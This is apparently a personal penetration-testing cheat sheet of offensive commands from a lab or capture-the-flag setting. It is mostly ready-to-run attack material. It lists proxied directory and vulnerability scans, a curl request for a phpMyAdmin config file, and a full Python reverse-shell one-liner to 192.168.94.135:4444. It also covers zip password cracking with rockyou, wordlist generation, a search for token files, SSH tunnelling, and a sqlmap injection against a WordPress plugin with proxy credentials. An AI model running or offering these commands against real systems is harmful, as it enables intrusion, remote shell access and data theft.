web server behind proxy server!
Dirb:
dirb http://host /usr/share/wordlists/dirb/big.txt -p host:3128

Nikto:
nikto -h host -useproxy host:3128

Curl:
curl -v host/robots.txt --proxy host:3128

curl -X POST -F 'file=/var/www/phpmy/config.inc.php' http://192.168.190.133/test.php

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.94.135",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Crack zip password:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -uv  flag.zip 

Create password file!
Crunch 7 7 -t ‘mos’%%%% -o test.txt 

find / -name "*token*" 2>/dev/null


ssh tunneling:
ssh -L 8080:192.168.0.7:80 e.lindsey@192.168.101.9
John the ripper cheat sheat
http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats

SQLMAP using proxy:
sudo sqlmap -u "http://cybear32c.lab/wp-content/plugins/wpsymposium/get_album_item.php?size=1"
--dbs
--proxy="http://192.168.101.8:3128" --proxy-cred="b.muncy:xxxx" 

dirb http://192.168.101.6/ -a 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0'
